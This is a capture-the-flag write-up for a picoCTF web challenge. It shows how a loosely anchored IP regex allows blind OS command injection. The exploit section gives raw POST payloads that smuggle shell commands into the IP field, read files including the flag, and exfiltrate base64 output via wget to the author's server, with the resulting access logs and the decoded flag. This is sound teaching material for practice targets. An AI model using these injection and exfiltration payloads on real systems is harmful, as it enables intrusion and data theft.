Tags: blind-os-command-injection 

Rating:

# ▼▼▼fancy-alive-monitoring - Points: 400▼▼▼
**This writeup is written by [@kazkiti_ctf](https://twitter.com/kazkiti_ctf)**

```
Uh oh, the login page is more secure... I think. http://2018shell2.picoctf.com:56265 (link). Source(http://2018shell2.picoctf.com:17593/index.txt).

Hint:
・This application uses the validation check both on the client side and on the server side, but the server check seems to be inappropriate.
・You should be able to listen through the shell on the server.
```

---
## 【view source code & Identify the vulnerability】

`http://2018shell2.picoctf.com:17593/index.txt`

```
<html>
<head>
<title>Monitoring Tool</title>
<script>
function check(){
ip = document.getElementById("ip").value;
chk = ip.match(/^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$/);
if (!chk) {
alert("Wrong IP format.");
return false;
} else {
document.getElementById("monitor").submit();
}
}
</script>
</head>
<body>
<h1>Monitoring Tool ver 0.1</h1>
<form id="monitor" action="index.php" method="post" onsubmit="return false;">

Input IP address of the target host
<input id="ip" name="ip" type="text">


<input type="button" value="Go!" onclick="check()">
</form>
<hr>

Target is NOT alive.</h3>");
break;
} else if (strpos($str, ', 0% packet loss') !== false){
printf("<h3>Target is alive.</h3>");
break;
}
}
} else {
echo "Wrong IP Format.";
}
}
?>
<hr>
index.php source code
</body>
</html>
```

`preg_match('/^(([1-9]?[0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]).){3}([1-9]?[0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])/',$ip)`

It is only necessary to have an IP address as a forward match.

`Blind OS command injection` vulnerability exists

---

## 【exploit】

```
POST /index.php HTTP/1.1
Host: 2018shell2.picoctf.com:17593
Content-Type: application/x-www-form-urlencoded
Content-Length: 66

ip=127.0.0.1;ls|base64|xargs wget http://my_server --user-agent
```

↓ access.log of my server

```
18.224.157.204 - - [15/Oct/2018:15:21:34 +0000] "GET / HTTP/1.1" 200 2261 "-" "aW5kZXgucGhwCmluZGV4LnR4dAp0aGUtc2VjcmV0LTEzMzUtZmxhZy50eHQKeGluZXRfc3RhcnR1"
```

`aW5kZXgucGhwCmluZGV4LnR4dAp0aGUtc2VjcmV0LTEzMzUtZmxhZy50eHQKeGluZXRfc3RhcnR1`

```
index.php
index.txt
the-secret-1335-flag.txt
xinet_startu
```

---

```
POST /index.php HTTP/1.1
Host: 2018shell2.picoctf.com:17593
Content-Type: application/x-www-form-urlencoded
Content-Length: 92

ip=127.0.0.1;cat the-secret-1335-flag.txt|base64|xargs wget http://my_server --user-agent
```

```
18.224.157.204 - - [15/Oct/2018:15:24:13 +0000] "GET / HTTP/1.1" 200 2261 "-" "SGVyZSBpcyB5b3VyIGZsYWc6IHBpY29DVEZ7bjN2M3JfdHJ1c3RfYV9iMHhfZDdhZDE2MmR9Cgo="
```

↓ base64 decode

Here is your flag: `picoCTF{n3v3r_trust_a_b0x_d7ad162d}`